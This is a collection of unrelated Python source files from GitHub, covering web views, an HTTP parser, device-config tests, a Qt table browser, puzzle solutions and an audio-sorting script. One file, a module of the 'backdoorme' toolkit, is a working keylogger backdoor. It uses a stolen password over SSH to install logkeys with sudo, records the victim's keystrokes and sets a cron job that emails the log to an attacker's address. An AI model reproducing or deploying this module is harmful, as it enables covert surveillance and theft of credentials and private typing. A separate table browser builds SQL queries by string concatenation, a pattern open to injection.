chip_ny_pixels=chip_size)\n\n chips_by_centers, indices_by_ul = image_chipper.chip_images_by_pixel_centers(\n self.png_image_data, pixel_y_center_list=y_centers, pixel_x_center_list=x_centers,\n chip_nx_pixels=chip_size, chip_ny_pixels=chip_size)\n\n assert(chips_by_ul == chips_by_centers).all()\n print(\"chipping by centers matches chipping by ul\")\n print(\"\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"BeamIO-Inc/resippy","sub_path":"tests/demo_tests/test_chipper.py","file_name":"test_chipper.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"19487386166","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport requests\n\ndef index(request):\n ''' Форма по умолчанию '''\n if request.method == \"GET\":\n return render(request, 'ai/sa.html',\n {'source': '', 'result': '?'})\n if request.method == \"POST\":\n r = requests.post(\"http://127.0.0.1:5000/api/imdb_sa_s/hello\", json=request.POST['q'])\n result = r.text\n res = result.split(';')\n pred = res[0]\n prob = res[1]\n\n answer_pred = ''\n if pred == '1':\n answer_pred = '+'\n else:\n answer_pred = '-'\n\n return render(request, 'ai/sa.html',\n {'source': request.POST['q'], 'result': answer_pred + \" (\" + prob + \")\"})","repo_name":"polyakovyevgeniy/portfolio_ai","sub_path":"jango_web_site/ai/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29417246789","text":"from albatross.data_types import (\n ImmutableMultiDict,\n ImmutableCaselessMultiDict\n)\nfrom albatross.compat import json\nimport urllib.parse as parse\nfrom httptools import parse_url\nimport cgi\nimport io\n\n\nREQUEST_STATE_PROCESSING = 0\nREQUEST_STATE_CONTINUE = 1\nREQUEST_STATE_COMPLETE = 2\n\n\ndef trim_keys(d):\n return {k.strip(): v for k, v in d.items()}\n\n\nclass FileStorage:\n\n def __init__(self, field_storage):\n self.filename = field_storage.filename\n self.value = field_storage.value\n\n\nclass Request:\n \"\"\"\n Attributes:\n method (str): One of GET, POST, PUT, DELETE\n path (str): Full request path\n query_string (str): Full query string\n query (dict): dict of the request query\n body (str): Request body\n args (dict): Dictionary of named parameters in route regex\n form (dict): Dictionary of body parameters\n \"\"\"\n\n def __init__(self, method=None, path=None, query_string='',\n args=None, headers=None, form=None, cookies=None):\n self._header_list = []\n self._state = REQUEST_STATE_PROCESSING\n self.method = method\n self.path = path\n self.query_string = query_string\n self.query = None\n self.args = args\n self.headers = ImmutableCaselessMultiDict()\n self.cookies = ImmutableMultiDict()\n self.raw_body = io.BytesIO()\n self.form = form\n\n if query_string:\n self.query = ImmutableMultiDict(parse.parse_qs(self.query_string))\n\n if headers:\n self.headers = ImmutableCaselessMultiDict(**headers)\n\n if cookies:\n self.cookies = ImmutableMultiDict(**cookies)\n\n def _parse_cookie(self, value):\n cookies = trim_keys(parse.parse_qs(value))\n return ImmutableMultiDict(cookies)\n\n def _parse_form(self, body_stream):\n # TODO theres probably a way to not read whole body first)\n env = {'REQUEST_METHOD': 'POST'}\n form = cgi.FieldStorage(body_stream, headers=self.headers, environ=env)\n d = {}\n for k in form.keys():\n if form[k].filename:\n d[k] = [FileStorage(form[k])]\n else:\n d[k] = [form[k].value]\n return ImmutableMultiDict(d)\n\n def _parse_body(self, body_stream):\n content_type = self.headers.get('Content-Type', '')\n if content_type == 'application/json':\n data = body_stream.getvalue().decode()\n self.form = json.loads(data)\n elif content_type.startswith('multipart/form-data'):\n self.form = self._parse_form(body_stream)\n elif content_type == 'application/x-www-form-urlencoded':\n data = body_stream.getvalue().decode()\n self.form = ImmutableMultiDict(parse.parse_qs(data))\n body_stream.seek(0)\n\n # HTTPRequestParser protocol methods\n def on_url(self, url: bytes):\n parsed = parse_url(url)\n self.path = parsed.path.decode()\n self.query_string = (parsed.query or b'').decode()\n self.query = ImmutableMultiDict(parse.parse_qs(self.query_string))\n\n def on_header(self, name: bytes, value: bytes):\n self._header_list.append((name.decode(), value.decode()))\n if name.lower() == b'expect' and value == b'100-continue':\n self._state = REQUEST_STATE_CONTINUE\n\n def on_headers_complete(self):\n self.headers = ImmutableCaselessMultiDict(self._header_list)\n cookie_value = self.headers.get('Cookie')\n if cookie_value:\n self.cookies = self._parse_cookie(cookie_value)\n\n def on_body(self, body: bytes):\n self.raw_body.write(body)\n\n def on_message_complete(self):\n self._state = REQUEST_STATE_COMPLETE\n self.raw_body.seek(0)\n self._parse_body(self.raw_body)\n\n @property\n def finished(self):\n return self._state == REQUEST_STATE_COMPLETE\n\n @property\n def needs_write_continue(self):\n return self._state == REQUEST_STATE_CONTINUE\n\n def reset_state(self):\n self._state = REQUEST_STATE_PROCESSING\n","repo_name":"kespindler/albatross","sub_path":"albatross/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"53"} +{"seq_id":"1579467058","text":"\"\"\"Unit tests for pyatv.conf.\"\"\"\n\nimport unittest\n\nfrom pyatv import conf, exceptions\nfrom pyatv.const import Protocol, OperatingSystem, DeviceModel\n\nADDRESS_1 = \"127.0.0.1\"\nADDRESS_2 = \"192.168.0.1\"\nNAME = \"Alice\"\nPORT_1 = 1234\nPORT_2 = 5678\nIDENTIFIER_1 = \"id1\"\nIDENTIFIER_2 = \"id2\"\nIDENTIFIER_3 = \"id3\"\nCREDENTIALS_1 = \"cred1\"\n\nMRP_PROPERTIES = {\n \"SystemBuildVersion\": \"17K795\",\n \"macAddress\": \"ff:ee:dd:cc:bb:aa\",\n}\n\nAIRPLAY_PROPERTIES = {\n \"model\": \"AppleTV6,2\",\n \"deviceid\": \"aa:bb:cc:dd:ee:ff\",\n \"osvers\": \"8.0.0\",\n}\n\n\nclass ConfTest(unittest.TestCase):\n def setUp(self):\n self.config = conf.AppleTV(ADDRESS_1, NAME)\n self.dmap_service = conf.DmapService(IDENTIFIER_1, None, port=PORT_1)\n self.mrp_service = conf.MrpService(\n IDENTIFIER_2, PORT_2, properties=MRP_PROPERTIES\n )\n self.airplay_service = conf.AirPlayService(\n IDENTIFIER_3, PORT_1, properties=AIRPLAY_PROPERTIES\n )\n\n def test_address_and_name(self):\n self.assertEqual(self.config.address, ADDRESS_1)\n self.assertEqual(self.config.name, NAME)\n\n def test_equality(self):\n self.assertEqual(self.config, self.config)\n\n atv2 = conf.AppleTV(ADDRESS_1, NAME)\n atv2.add_service(conf.AirPlayService(IDENTIFIER_1, PORT_1))\n self.assertNotEqual(self.config, atv2)\n\n def test_add_services_and_get(self):\n self.config.add_service(self.dmap_service)\n self.config.add_service(self.mrp_service)\n self.config.add_service(self.airplay_service)\n\n services = self.config.services\n self.assertEqual(len(services), 3)\n\n self.assertIn(self.dmap_service, services)\n self.assertIn(self.mrp_service, services)\n self.assertIn(self.airplay_service, services)\n\n self.assertEqual(self.config.get_service(Protocol.DMAP), self.dmap_service)\n self.assertEqual(self.config.get_service(Protocol.MRP), self.mrp_service)\n self.assertEqual(\n self.config.get_service(Protocol.AirPlay), self.airplay_service\n )\n\n def test_identifier_order(self):\n self.assertIsNone(self.config.identifier)\n\n self.config.add_service(self.dmap_service)\n self.assertEqual(self.config.identifier, IDENTIFIER_1)\n\n self.config.add_service(self.mrp_service)\n self.assertEqual(self.config.identifier, IDENTIFIER_2)\n\n self.config.add_service(self.airplay_service)\n self.assertEqual(self.config.identifier, IDENTIFIER_2)\n\n def test_add_airplay_service(self):\n self.config.add_service(self.airplay_service)\n\n airplay = self.config.get_service(Protocol.AirPlay)\n self.assertEqual(airplay.protocol, Protocol.AirPlay)\n self.assertEqual(airplay.port, PORT_1)\n\n def test_main_service_no_service(self):\n with self.assertRaises(exceptions.NoServiceError):\n self.config.main_service()\n\n def test_main_service_airplay_no_service(self):\n self.config.add_service(self.airplay_service)\n with self.assertRaises(exceptions.NoServiceError):\n self.config.main_service()\n\n def test_main_service_get_service(self):\n self.config.add_service(self.dmap_service)\n self.assertEqual(self.config.main_service(), self.dmap_service)\n\n self.config.add_service(self.mrp_service)\n self.assertEqual(self.config.main_service(), self.mrp_service)\n\n def test_main_service_override_protocol(self):\n self.config.add_service(self.dmap_service)\n self.config.add_service(self.mrp_service)\n self.assertEqual(\n self.config.main_service(protocol=self.dmap_service.protocol),\n self.dmap_service,\n )\n\n def test_set_credentials_for_missing_service(self):\n self.assertFalse(self.config.set_credentials(Protocol.DMAP, \"dummy\"))\n\n def test_set_credentials(self):\n self.config.add_service(self.dmap_service)\n self.assertIsNone(self.config.get_service(Protocol.DMAP).credentials)\n\n self.config.set_credentials(Protocol.DMAP, \"dummy\")\n self.assertEqual(self.config.get_service(Protocol.DMAP).credentials, \"dummy\")\n\n def test_empty_device_info(self):\n device_info = self.config.device_info\n self.assertEqual(device_info.operating_system, OperatingSystem.Unknown)\n self.assertIsNone(device_info.version)\n self.assertIsNone(device_info.build_number)\n self.assertEqual(device_info.model, DeviceModel.Unknown)\n self.assertIsNone(device_info.mac)\n\n def test_tvos_device_info(self):\n self.config.add_service(self.mrp_service)\n self.config.add_service(self.airplay_service)\n\n device_info = self.config.device_info\n self.assertEqual(device_info.operating_system, OperatingSystem.TvOS)\n self.assertEqual(device_info.version, \"8.0.0\")\n self.assertEqual(device_info.build_number, \"17K795\")\n self.assertEqual(device_info.model, DeviceModel.Gen4K)\n self.assertEqual(device_info.mac, \"FF:EE:DD:CC:BB:AA\")\n\n def test_tvos_device_info_no_airplay(self):\n self.config.add_service(self.mrp_service)\n\n device_info = self.config.device_info\n self.assertEqual(device_info.operating_system, OperatingSystem.TvOS)\n self.assertEqual(device_info.version, \"13.3.1\")\n self.assertEqual(device_info.build_number, \"17K795\")\n self.assertEqual(device_info.model, DeviceModel.Unknown)\n self.assertEqual(device_info.mac, \"FF:EE:DD:CC:BB:AA\")\n\n def test_legacy_device_info(self):\n self.config.add_service(self.dmap_service)\n self.config.add_service(self.airplay_service)\n\n device_info = self.config.device_info\n self.assertEqual(device_info.operating_system, OperatingSystem.Legacy)\n self.assertEqual(device_info.version, \"8.0.0\")\n self.assertIsNone(device_info.build_number)\n self.assertEqual(device_info.model, DeviceModel.Gen4K)\n self.assertEqual(device_info.mac, \"AA:BB:CC:DD:EE:FF\")\n\n def test_ready_dmap(self):\n self.assertFalse(self.config.ready)\n\n self.config.add_service(self.airplay_service)\n self.assertFalse(self.config.ready)\n\n self.config.add_service(self.dmap_service)\n self.assertTrue(self.config.ready)\n\n def test_ready_mrp(self):\n self.assertFalse(self.config.ready)\n\n self.config.add_service(self.airplay_service)\n self.assertFalse(self.config.ready)\n\n self.config.add_service(self.mrp_service)\n self.assertTrue(self.config.ready)\n\n # This test is a bit strange and couples to protocol specific services,\n # but it's mainly to exercise string as that is important. Might refactor\n # this in the future.\n def test_to_str(self):\n self.config.add_service(conf.DmapService(IDENTIFIER_1, \"LOGIN_ID\"))\n self.config.add_service(conf.MrpService(IDENTIFIER_2, PORT_2))\n\n # Check for some keywords to not lock up format too much\n output = str(self.config)\n self.assertIn(ADDRESS_1, output)\n self.assertIn(NAME, output)\n self.assertIn(\"LOGIN_ID\", output)\n self.assertIn(str(PORT_2), output)\n self.assertIn(\"3689\", output)\n","repo_name":"TeguhPratala/pyatv","sub_path":"tests/test_conf.py","file_name":"test_conf.py","file_ext":"py","file_size_in_byte":7196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"19930248939","text":"import sys; sys.path.append('..')\n\nfrom dimsumpy.qt5.dataframemodel import DataFrameModel\nfrom functools import partial\nfrom futures_browser.fut_browser_view import FutBrowserWin\n\nimport pandas as pd\nfrom pandas.core.frame import DataFrame\nfrom PySide2.QtWidgets import QApplication, QCheckBox ,QGridLayout, QLineEdit ,QWidget, QFormLayout\nfrom PySide2.QtCore import Qt, QThread, QCoreApplication, QDateTime ,QRegExp ,QSortFilterProxyModel\n\nfrom shared_model.sql_model import cnx, postgres_engine\nfrom shared_model.st_data_model import MySortFilterProxyModel\nfrom shared_model.fut_data_model import getfutures, getfutcode\nfrom typing import Any, Dict, Generator, List\n\n\nclass FutBrowserDialog(FutBrowserWin):\n def __init__(self) -> None:\n super().__init__()\n self.b_list_option.clicked.connect(self.load_table)\n self.b_single_option.clicked.connect(self.load_table)\n\n def load_table(self) -> None:\n self.clear()\n sender: str = self.sender().accessibleName()\n\n if sender == 'b_list_option':\n tablename: str = 'fut_option'\n stockstr: str = self.stock_list_combobox.currentText()\n stocklist: List[str] = getfutcode(stockstr)\n stockliststr: str = str(tuple(stocklist))\n elif sender == 'b_single_option':\n tablename: str = 'fut_option'\n stockstr: str = self.stock_list_combobox_individual.currentText()[:2]\n stocklist: List[str] = [stockstr]\n stockliststr: str = \"('\" + stockstr + \"')\" # for single tuple\n else:\n print('no sender')\n q_clause: str = '' if not stocklist else ' WHERE symbol IN ' + stockliststr # prevent empty LineEdit\n q: str = 'SELECT * FROM ' + tablename + q_clause\n print(q)\n df: DataFrame = pd.read_sql(sql=q, con=postgres_engine)\n model: DataFrameModel = DataFrameModel(df)\n proxy: MySortFilterProxyModel = MySortFilterProxyModel(self)\n proxy.setSourceModel(model)\n self.pandas_tableview.setModel(proxy)\n\n grid: QGridLayout = QGridLayout() # If the Grid was created in the view, it will get deleted\n checkboxes: List[QCheckBox] = [QCheckBox(x) for x in df.columns]\n for count, checkbox in enumerate(checkboxes):\n checkbox.setChecked(True)\n checkbox.stateChanged.connect(partial(self.display_column, index=count))\n le1: QLineEdit = QLineEdit()\n le2: QLineEdit = QLineEdit()\n le1.textChanged.connect(lambda text, col=count:proxy.setFilterByColumn(\n QRegExp(text, Qt.CaseInsensitive, QRegExp.RegExp), col))\n le2.textChanged.connect(lambda text, col=count:proxy.setFilterByColumn(\n QRegExp(text, Qt.CaseInsensitive, QRegExp.FixedString), col))\n\n grid.addWidget(checkbox, count, 0)\n grid.addWidget(le1, count, 1)\n grid.addWidget(le2, count, 2)\n\n QWidget().setLayout(self.dockwin.layout()) # get rid of the default layout\n self.dockwin.setLayout(grid)\n\n def display_column(self, state: int, index: int) -> None: # state: checked 2 ; unchecked 0\n if state == Qt.Checked:\n self.pandas_tableview.setColumnHidden(index, False)\n else:\n self.pandas_tableview.setColumnHidden(index, True)\n\n\ndef main() -> None:\n app: QApplication = QApplication(sys.argv)\n w: FutBrowserDialog = FutBrowserDialog()\n w.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gate-max/pizzapy","sub_path":"brewing/retired/futures_browser/fut_browser_ctrl.py","file_name":"fut_browser_ctrl.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42397667042","text":"\nfrom injection import input_injection\nfrom models import Coords\nfrom year2022.day09.a import Coords, follow, move_head\n\n\n@input_injection\ndef main(_input: str) -> str:\n result: int = 0\n seen: set[tuple[int, int]] = set()\n\n head = Coords(name=\"head\")\n tail = Coords(name=\"tail\")\n snake = [head]\n for i in range(8):\n snake.append(Coords(name=f\"bodypart-{i + 1}\"))\n snake.append(tail)\n\n for line in _input.splitlines():\n direction, steps = line.split()\n for _ in range(int(steps)):\n move_head(head, direction)\n\n for i in range(len(snake) - 1):\n follow(snake[i], snake[i + 1])\n\n seen.add(tail.coords)\n\n result = len(seen)\n\n return str(result)\n\n\nif __name__ == \"__main__\":\n print(main())\n","repo_name":"justcallmelarry/advent-of-code","sub_path":"src/year2022/day09/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32544882928","text":"from backdoors.backdoor import *\nimport os\nimport time\n\nclass Keylogger(Backdoor):\n prompt = Fore.RED + \"(keylogger) \" + Fore.BLUE + \">> \" + Fore.RESET\n\n def __init__(self, core):\n cmd.Cmd.__init__(self)\n self.intro = GOOD + \"Using keylogger auxiliary module\"\n self.core = core\n self.options = {\n \"email\": Option(\"email\", \"False\", \"set to \\\"True\\\" to send reports over email\", False),\n \"address\": Option(\"address\", \"example@example.com\", \"add email address\", False),\n\n }\n self.allow_modules = True\n self.modules = {}\n self.help_text = INFO + \"Installs logkeys and starts a listener, and gives the user the option to send the logs back to a specific email address.\"\n self.target = self.core.curtarget\n\n def get_command(self):\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S logkeys --start --output ~/log.log\")\n\n def do_exploit(self, args):\n os.system('git clone https://github.com/kernc/logkeys')\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S rm -rf logkeys/\")\n self.target.scpFiles(self, 'logkeys', True)\n self.target.ssh.exec_command(\"./logkeys/configure\")\n time.sleep(10)\n print(\"Configuring...\")\n self.target.ssh.exec_command(\"make logkeys\")\n time.sleep(10)\n print(\"Making...\")\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S make install logkeys\")\n print(\"Installing...\")\n time.sleep(10)\n self.target.ssh.exec_command(\"touch log.log\")\n time.sleep(1)\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S logkeys --start --output ~/log.log\")\n\n print(\"Starting...\")\n\n if (self.get_value(\"email\")):\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S apt-get install sendmail\")\n self.target.ssh.exec_command(\"echo \" + self.target.pword + \" | sudo -S apt-get install mailutils\")\n self.target.ssh.exec_command(\"crontab -l > mycron\")\n self.target.ssh.exec_command(\"echo 'echo report | mail -A ~/log.log \" + self.get_value(\"address\") + \"' > script.sh\")\n self.target.ssh.exec_command(\"echo \\\"* * * * 0 echo password | sudo -S bash ~/script.sh\\\" >> mycron && crontab mycron && rm mycron\")\n print(\"You will recieve an email(probably in spam) with your new keylogger report every hour.\")\n for mod in self.modules.keys():\n print(INFO + \"Attempting to execute \" + mod.name + \" module...\")\n mod.exploit(self.get_command())\n\n","repo_name":"Kkevsterrr/backdoorme","sub_path":"backdoors/auxiliary/keylogger.py","file_name":"keylogger.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":729,"dataset":"github-code","pt":"53"} +{"seq_id":"31637373768","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\nclass csr():\n def __init__(self, n: int, edges: list):\n self.start = [0] * (n + 1)\n self.elist = [0] * len(edges)\n for e in edges:\n self.start[e[0] + 1] += 1\n for i in range(1, n + 1):\n self.start[i] += self.start[i - 1]\n counter = self.start[::]\n for e in edges:\n self.elist[counter[e[0]]] = e[1]\n counter[e[0]] += 1\n\n\nclass internal_scc_graph():\n def __init__(self, n: int = 0):\n self.__n = n\n self.__edges = []\n\n def num_vertices(self):\n return self.__n\n\n def add_edge(self, from_: int, to: int):\n self.__edges.append([from_, to])\n\n def scc_ids(self):\n g = csr(self.__n, self.__edges)\n now_ord = 0\n group_num = 0\n visited = []\n low = [0] * self.__n\n ord = [-1] * self.__n\n ids = [0] * self.__n\n parent = [-1] * self.__n\n\n for root in range(self.__n):\n if(ord[root] == -1):\n stack = []\n stack.extend([root] * 2)\n while(stack):\n v = stack.pop()\n if(ord[v] == -1):\n visited.append(v)\n low[v] = now_ord\n ord[v] = now_ord\n now_ord += 1\n for i in range(g.start[v], g.start[v + 1]):\n to = g.elist[i]\n if(ord[to] == -1):\n stack.extend([to] * 2)\n parent[to] = v\n else:\n low[v] = min(low[v], ord[to])\n else:\n if(low[v] == ord[v]):\n while(True):\n u = visited.pop()\n ord[u] = self.__n\n ids[u] = group_num\n if(u == v):\n break\n group_num += 1\n if(parent[v] != -1):\n low[parent[v]] = min(low[parent[v]], low[v])\n\n for i, x in enumerate(ids):\n ids[i] = group_num - 1 - x\n return [group_num, ids]\n\n def scc(self):\n ids = self.scc_ids()\n group_num = ids[0]\n counts = [0] * group_num\n for x in ids[1]:\n counts[x] += 1\n groups = [[] for _ in range(group_num)]\n for i, x in enumerate(ids[1]):\n groups[x].append(i)\n\n return groups\n\n\nclass scc_graph():\n def __init__(self, n: int):\n self.__internal = internal_scc_graph(n)\n\n def add_edge(self, from_: int, to: int):\n n = self.__internal.num_vertices()\n assert (0 <= from_) & (from_ < n)\n assert (0 <= to) & (to < n)\n self.__internal.add_edge(from_, to)\n\n def scc(self):\n return self.__internal.scc()\n \n def scc_ids(self):\n return self.__internal.scc_ids()\n\nimport sys\nread = sys.stdin.read\n\nn,m,k,*data = read().split()\nn,m,k = map(int, [n,m,k])\nc = data[:n]\nab = [int(i)-1 for i in data[n:]]\n\ngr = scc_graph(n)\nit = iter(ab)\nfor a,b in zip(it,it):\n gr.add_edge(a,b)\n\ngroup_num, ids = gr.scc_ids()\n\nalp = [[] for _ in range(group_num)]\nfor i in range(n):\n alp[ids[i]].append(c[i])\n\nlinks2 = [set() for _ in range(group_num)]\nlinks2_rev = [set() for _ in range(group_num)]\nit = iter(ab)\nfor a,b in zip(it,it):\n a = ids[a]\n b = ids[b]\n if a != b:\n links2[a].add(b)\n links2_rev[b].add(a)\n\nstack = []\ndeg_in = [0] * group_num\nfor i in range(group_num):\n deg_in[i] = len(links2_rev[i])\n if deg_in[i] == 0:\n stack.append(i)\n\ndp = [['z' * (k+1)] * (k+1) for _ in range(group_num)]\n\nwhile stack:\n i = stack.pop()\n alp[i].sort()\n if len(alp[i]) == 0:\n si = ''\n else:\n si = ''.join(alp[i])\n for j in range(len(si)+1):\n if j > k:\n break\n dp[i][j] = si[:j]\n for j in range(1,k+1):\n head = 'z'*(k+1)\n for p in links2_rev[i]:\n head = min(head,dp[p][j])\n for l in range(len(si)+1):\n if j + l > k:\n break\n dp[i][j+l] = min(dp[i][j+l], head + si[:l])\n \n for child in links2[i]:\n deg_in[child] -= 1\n if deg_in[child] == 0:\n stack.append(child)\n\n\nans = 'z' * (k+1)\nfor i in range(group_num):\n ans = min(ans,dp[i][k])\n\nif ans == 'z'*(k+1):\n print(-1)\nelse:\n print(ans)\n\n\n \n\n\n\n","repo_name":"komajun365/competitive_programming","sub_path":"arc/arc030/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5621170645","text":"from flask import Flask, render_template\r\nimport redis\r\nimport json\r\n\r\napp = Flask(__name__)\r\nredis_client = redis.StrictRedis(host='localhost', port=6379)\r\n\r\n@app.route('/')\r\ndef index():\r\n # Récupérer toutes les clés du modèle \"vlibid:*\"\r\n all_keys = redis_client.keys(\"vlibid:*\")\r\n\r\n # Initialiser une liste pour stocker toutes les données\r\n all_data = []\r\n\r\n # Parcourir toutes les clés et récupérer les données associées\r\n for key in all_keys:\r\n data_raw = redis_client.hgetall(key)\r\n data = {key.decode('utf-8'): value.decode('utf-8') for key, value in data_raw.items()}\r\n all_data.append(data)\r\n\r\n return render_template('index_all.html', all_data=all_data)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"LudovicGauvin99/TPRedis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72520185449","text":"import threading\nimport os\nimport re\nimport shutil\nimport time\n\nimport pyaudio\nimport wave\n\nclass Cancel_token:\n def __init__(self):\n self.cancelled = False\n\n def cancel(self):\n self.cancelled = True\n\n def is_cancelled(self):\n return self.cancelled\n\nclass AudioFile:\n chunk = 1024\n # playing = False\n\n def __init__(self, file, cancel_token):\n \"\"\" Init audio stream \"\"\" \n self.wf = wave.open(file, 'rb')\n self.p = pyaudio.PyAudio()\n self.stream = self.p.open(\n format = self.p.get_format_from_width(self.wf.getsampwidth()),\n channels = self.wf.getnchannels(),\n rate = self.wf.getframerate(),\n output = True\n )\n self.cancel_token = cancel_token\n\n def play(self):\n \"\"\" Play entire file \"\"\"\n data = self.wf.readframes(self.chunk)\n # self.playing = True\n while data != b'' and not self.cancel_token.is_cancelled():\n self.stream.write(data)\n data = self.wf.readframes(self.chunk)\n # self.playing = False\n\n def close(self):\n \"\"\" Graceful shutdown \"\"\" \n self.stream.close()\n self.p.terminate()\n\n # def stop(self):\n # \"\"\"Stop playback\"\"\"\n # self.playing = False\n # self.close()\n\n\ndef check_audio_file(path) -> int:\n\n def except_func(e: Exception) -> int:\n print(f\"Error while playing audio file: {path}, error: {e}\")\n return 2\n \n cancel_token = Cancel_token()\n try:\n audio_file = AudioFile(path, cancel_token)\n except Exception as e:\n return except_func(e)\n \n t = threading.Thread(target=audio_file.play)\n try:\n t.start()\n is_sample = input()\n cancel_token.cancel()\n audio_file.close()\n t.join()\n\n if is_sample == \"n\" or is_sample == \"3\":\n return 1\n elif is_sample == \"r\" or is_sample == \"0\":\n return check_audio_file(path)\n elif is_sample == \"e\" or is_sample == \"9\":\n return except_func(Exception(\"User was not sure\"))\n else:\n return 0\n except Exception as e:\n t.join()\n return except_func(e)\n \n\ndef manual_check(source_path):\n not_sample_path = os.path.join(source_path, \"not_sample\")\n if not os.path.exists(not_sample_path):\n os.mkdir(not_sample_path)\n\n error_files_path = os.path.join(source_path, \"error_files\")\n if not os.path.exists(error_files_path):\n os.mkdir(error_files_path)\n\n controlled_samples_path = os.path.join(source_path, \"controlled_samples\")\n if not os.path.exists(controlled_samples_path):\n os.mkdir(controlled_samples_path)\n\n for file in os.listdir(source_path):\n if not file.endswith(\".wav\"):\n continue\n path = os.path.join(source_path, file)\n return_value = check_audio_file(path)\n\n if return_value == 0:\n shutil.move(path, os.path.join(controlled_samples_path, file))\n if return_value == 1:\n shutil.move(path, os.path.join(not_sample_path, file))\n elif return_value == 2:\n shutil.move(path, os.path.join(error_files_path, file))\n\n\ndef main():\n source_path = r\"C:\\Users\\llama\\Desktop\\programming shit\\Bakalarka\\manual_check\"\n manual_check(source_path)\n\nif __name__ == \"__main__\":\n main()","repo_name":"PatrikBacko/Bachelor_thesis-Electronic_music","sub_path":"scripts/data_sorting_script/manual_check.py","file_name":"manual_check.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22323060425","text":"from wsgiref.simple_server import make_server\nimport cgi\nimport random\n\nHTML_PAGE_Rating = \"\"\"\n<html>\n<title>Рейтинг команд\n\n

Рейтинг команд

\n
\n\n\n\n\n\n\n\n\n\n\n\n\n{}\n
НазваІгорВиграшівНічиїхПоразокГолів забитоГолів пропущеноКількість очок
\n\n\n\"\"\"\n\nHTML_PAGE_Results = \"\"\"\n\n\n\n

Ігрові результати

\n
\n\n\n\n\n\n\n\n{}\n
Перша командаДруга команда__
\n\n\n\"\"\"\n\nHTML_PAGE_main = \"\"\"\nГоловна\n\n
\n
\n\n
\n
\n\n
\n\n\n\"\"\"\n\nclass Command:\n name=''\n games=1\n win=0\n lose=0\n withdraws=0\n goal_in=0\n goal_out=0\n\n def GetScore(self):\n return self.win*3+self.withdraws*1\n def __init__(self,n):\n self.name=n\n def __lt__(self,other):\n if self.GetScore()!=other.GetScore():\n return self.GetScore()int(item[3]):\n is_first_winer=True\n \n index=0\n while index' + item.name + '' + str(item.games) + '' + str(item.win) +'' + str(item.withdraws) + '' + str(item.lose) + '' + str(item.goal_in) + '' + str(item.goal_out) + '' + str(item.GetScore()) + ''\n index+=1\n return result\n\n\ndef CreateRatingList():\n result=''\n list_of_strings=[]\n list_file = open(\"list_of_matches.txt\")\n for line in list_file: \n divided_line = line.split()\n list_of_strings.append(divided_line)\n \n\n print(list_of_strings)\n list_file.close()\n\n\n for item in list_of_strings:\n result+='' + item[0] + '' + item[1] + '' + item[2] + '' + item[3] +''\n print(result)\n return result\n \ndef CreateMatchList():\n result=''\n list_of_strings=[]\n list_file = open(\"list_of_matches.txt\")\n for line in list_file: \n divided_line = line.split()\n list_of_strings.append(divided_line)\n \n list_file.close()\n for item in list_of_strings:\n result+='' + item[0] + '' + item[1] + '' + item[2] + '' + item[3] +''\n return result\n\n\n\ndef application(environ,start_response):\n if environ.get('PATH_INFO', '').lstrip('/') == \"results\":\n body = HTML_PAGE_Results.format(CreateMatchList())\n start_response('200 OK', [('Content-Type', 'text/html; charset=utf-8')])\n elif environ.get('PATH_INFO', '').lstrip('/') == 'rating':\n body = HTML_PAGE_Rating.format(CreateResults())\n start_response('200 OK', [('Content-Type', 'text/html; charset=utf-8')])\n elif environ.get('PATH_INFO', '').lstrip('/') == '':\n body = HTML_PAGE_main\n start_response('200 OK', [('Content-Type', 'text/html; charset=utf-8')])\n else:\n body=\"OOOPS! Something is wrong!\"\n start_response('404 NOT FOUND', [('Content-Type', 'text/plain')])\n return [bytes(body, encoding='utf-8')]\nprint('=== Local WSGI webserver ===')\nmy_server = make_server('localhost', 8000, application).serve_forever()","repo_name":"AlexP04/WSGI_programs","sub_path":"WSGI_football_server.py","file_name":"WSGI_football_server.py","file_ext":"py","file_size_in_byte":6483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19207827962","text":"import tensorflow as tf\nimport numpy as np\nimport gym\nimport time\n\n############################### DDPG ####################################\n\nclass DDPG(object):\n ##################### hyper parameters ####################\n LR_A = 0.001 # learning rate for actor\n LR_C = 0.002 